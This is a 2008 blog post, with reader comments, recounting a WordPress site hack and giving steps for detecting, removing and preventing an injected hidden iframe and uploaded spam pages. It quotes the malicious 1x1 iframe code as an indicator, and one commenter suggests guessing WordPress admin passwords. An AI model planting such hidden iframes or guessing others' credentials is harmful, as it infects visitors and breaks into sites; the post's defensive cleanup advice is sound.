WordPress Has Been Hacked: Are You Protected?

by TheWis April 24th, 2008 

Wordpress Hackers

For more than 7 years now, I've been working with websites based on popular applications such as WordPress, Vbulletin and PHPnuke. When dealing with such popular applications, words like 'hacking' or 'security hole' will become something that you'll get use to either dealing with or worrying about.

In the last 2 years, there have been some major developing concerns. Today, Hackers are much more familiar with the importance of links and, since some may be SEO's, are using hacking as a link building strategy or as a negative link building tactic targeting the ranking of their competitors. Regardless of the intention of the Hacker, your website's ranking may be damaged to some degree.

My story started few days ago with Google showing this message associated with the search engine results for one of my personal websites. “This site may harm your computer.”

On the same day, I got an email from Google notifying me about this. To ensure you receive this notification, ensure you have access to abuse@yourdomain.com email.

The website in question is a relatively small one based on WordPress. This made me recall an incident from a month ago when a hacker uploaded more than ten pages on my site. Each page, which had more than 100 links pointing to many of the worst websites in the world, were uploaded to my UPLOAD WP directory “/wp-content/uploads/”

This directory is a fairly easy target as it has 777 permissions. I suspect the individual may be an SEO, as he knew that uploading these pages will mean nothing in this directory unless they have some inbound links so the search engine will know about them. As a result, the individual built tens of inbound links to these pages and got them indexed. I found out about these pages only after they were indexed and before having them removed.

After reading the message from Google, I began to think that they acted very late for this incident, as such, I didn’t make any changes on the site. The only thing I did was to download the entire site files and scan them with a spyware software, everything appeared clean.

Wordpress Hackers

Next I went through the files and didn’t find anything wrong so I went to Google webmaster Tools where I found almost an entire page alert about the problem with a link to review the website. Next I filed a revision request.

Two days later, I re-checked Google Webmaster Tools only to find a new Google response including four pages (URL's) on my blog having the offending code. After a quick review for the pages I found a code repeated on all of them and didn’t look clean as it has an Iframe

<!– Traffic Statistics –> <iframe src=http://xx.xx.xxx.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

Lastly, I conducted some additional research and found out that the folks at WordPress support forum were discussing the same problem, however were not sure about the infected version of WordPress. In my case, I believe it's WordPress 2.5 and/or may be older versions. I then checked all WordPress files on my website and none of them has this code, so the code most likely was injected in the database using xmlrpc.php which has the ability to import remote content to WordPress.

I removed the offending code and went back again to Google Webmaster Tools, filed another revision request and got the message “This site may harm your computer.” removed, it took me 3 days to get rid of this message while many people keep saying that might take up to 15 days and the credit for this quick result should be given to the amazing team behind Google Webmaster Tools the guys there respond to any revision request in less than 24 hours, the really deal responsibly with webmasters encountering this message as they know the damage it causes to any website.

Hopefully this doesn't happen to you, however if it does, here are list of check-ups to conduct:

How to diagnose if your blog has this problem:

1- If you feel your blog is taking more time than usual to load, or if you see in the status bar a message says connecting to xx.xxx.x.157
2- IF you view the source code of any page in your blog and see this code.
3- If your blog search engines result marked “This site may harm your computer.” Or you get any message from Google in this regard.

How to fix this problem:

1- Upgrade your WordPress to the latest version, and keep doing that on monthly basis, the folks there will figure out how to keep WordPress safe software so lean on them.
2- Upgrading WordPress will not take the code off, you need to go to the infected post and use the HTML edit button in WordPress and remove the code, or if you have PHP MYadmin you can use it, just choose your blog database and then go to search, put in the search box any word of the code like “iframe” and select the table wp_posts and hit go, you will see all the infected posts.

How to protect yourself in future:

1- As mentioned before, keep your word press updated to the latest version and make sure to stay updated with their announcements.
2- Every month scan manually your WordPress files and see if you find any suspicious files.
3- Check always your webstat especially the content section and see if there are any pages record visits but you don’t know about them.
4- Check the source code of your posts on regular basis to make sure that it is clean of any malicious codes.

As blog strategy is getting more popular among SEO companies, the technical part of WordPress should be covered all the time by some technical people to save the good work of marketing people. :-)

You May Also Like

21 Responses to “WordPress Has Been Hacked: Are You Protected?”

  1. Shana Albert says:

    Great post!!

    As I read this post I am still trying to fix my father's blog that got hacked yesterday… What a pain in the "you-know-what". I'm going to use your tips to fix and hopefully prevent this from ever happening again.

    Thank you.

    Shana

  2. dan says:

    This is exactly what happened to my site, down to the /iframe/ ect, embedded in two files in content. Agree on the xmlrpc.php file as well as it has historically had issues.

  3. Roby says:

    Very good and helpful information. Thank you. I also seem to be getting an excessive amount of spam from online pharmaceutical offers which irritates the heck out of me. I did recently upgrade to the latest version of wordpress in hopes that this would go away however it still persists. My son is a blog/SEO guru so I will also pass this article on to him as well. Thanks for taking the time to post such an informative entry.

    Kind regards,
    Roby

  4. pKay says:

    I think this is geared towards wordpress.org and self hostest domain websites right? We at wordpress.com are safe? Kind of? Sort of? Maybe??

    Cheers!

  5. Very good Post. I agree with the online spam from pharmaceutical junk. I do not know what these folks are thinking with spamming everyone to death. Probably spam bots. I used to have some forums but deleted them because of the spam. Keep up the great writing very good stuff.

  6. [...] Search Engine people has a great article about the latest round of wordpress security breaches, and it sums up nicely what happened here over the last two weeks down to the attack profile, the malware link left behind, and the rest of it. If you want another analysis of the hack, then you want to go read this article. [...]

  7. [...] suffered twice) – here are two great articles on how to avoid being hacked and how to recover, from Search Engine People and Daily Blog [...]

  8. Do you jsut ahve to set up an abuse@domain.com and you will recieve emails like this?

    Are there any other emails that should be set up?

  9. TheWis says:

    @Shana
    Please let me know if you need any help.
    @ Dan
    Sorry to hear that, just make sure you search your posts using the database to make sure that the offending code is not existed any more
    @ Roby
    Killing spam shouldn't be a problem, you can even ignore it even without causing any damage to the blog.
    @ pKay
    Yes I am talking about self host here, in your case you don’t have access to upgrade the files so WordPress will take care of that for you, but I am not sure about the files structure in this case if it is the same, some checkup will help anyhow.
    @Pete
    Thanks, the good aspect of spamming is that it doesn’t have any direct damage to the blog like hacking
    @Make Money Blogging
    Actually for this domain I have the Catch All feature enabled so I got 5 emails from Goolge to different email accounts, but the only one stuck in my mind is abuse@yourdomian.com, I will check if I still have all of them and post them.

  10. The pages in the upload directory is being abused via blog and forum spam. We're getting tons of spam pointing to such pages.

  11. TheWis says:

    @Make Money Blogging
    Here is a list of the emails that will get a copy of Google's malware notification:
    abuse@domain.com, admin@domain.com, administrator@domain.com, contact@domain.com, info@domain.com, postmaster@domain.com, support@domain.com, webmaster@domain.com

    The message will start like this:

    Dear site owner or webmaster of domain.com,

    We recently discovered that some of your pages can cause users to be
    infected with malicious software. We have begun showing a warning page
    to users who visit these pages by clicking a search result on
    Google.com.
    Below is an example URL on your site which can cause users to be
    infected (space inserted to prevent accidental clicking in case your
    mail client auto-links URLs):

  12. [...] was talk about a WordPress security vulnerability over at Search Engine People, but I don't know if this is the same as the one that was fixed or [...]

  13. Very helpful – but I'd rather suggest to subscribe to the WordPress Development blog to get notifications for urgent security updates than update on a monthly schedule.

    A monthly schedule might leave your blog vulnerable for as much as 30 days if you happen to miss a fix by just one day. That's an eternity for hacker to target your site.

  14. Marc says:

    one of my wordpress sites was hacked a month ago and they used it to send out spam for a few hours before i shut them out. my host thinks it was because i was still using a slightly old version of wordpress

    so we also have to be on the lookout for files installed which can send out email and can bypass the servers normal email procotols and safegaurds

    im still a big supporter of wordpress though

  15. Utah SEO says:

    Man I hate those damn iFrame hacks.

  16. Matt Ridout says:

    Really informative post about wordpress – I will have to keep my eyes open!

  17. GhostHoster says:

    I think hacking wordpress is very easy compared to any other things !!!
    really ,
    Look
    most of the WordPress blogs have Admin as username and u just need to find the password.
    Just try few combinations with blog auther name or blog name

    simple :)

  18. bonfide says:

    In the process of getting back up from a hack that inserted the code.. I'm re-installing a current version of WP and then reloading a copy of my database and tweaking it on an air gapped local box. Then it will go back up and I'll petition Google for a clean review.

    God help the hacker if I ever found him/her….

  19. [...] suffered twice) – here are two great articles on how to avoid being hacked and how to recover, from Search Engine People and Daily Blog [...]

  20. chineseguy says:

    suffered twice) – I believe wordpress is trying to fix the bugs and holes continuesly, but still you have to be careful, change your passwords frequently, make it hard to guess, get a good hosting company, besides try to make backups frequently.

  21. James says:

    Nothing wordpress does can help you from being hacked, it's a sad truth but with each new release the hackers also have access to the new release and thus they still know what to do in order to hack your blog.

    Only way to protect yourself is to get WP Secured (see url) as it takes you step by step on what to do to change the functionality of your blog so the hackers can NOT hack your blog.

    WordPress.org will not do this for you, you must take action now and save yourself alot of trouble in the future..

    James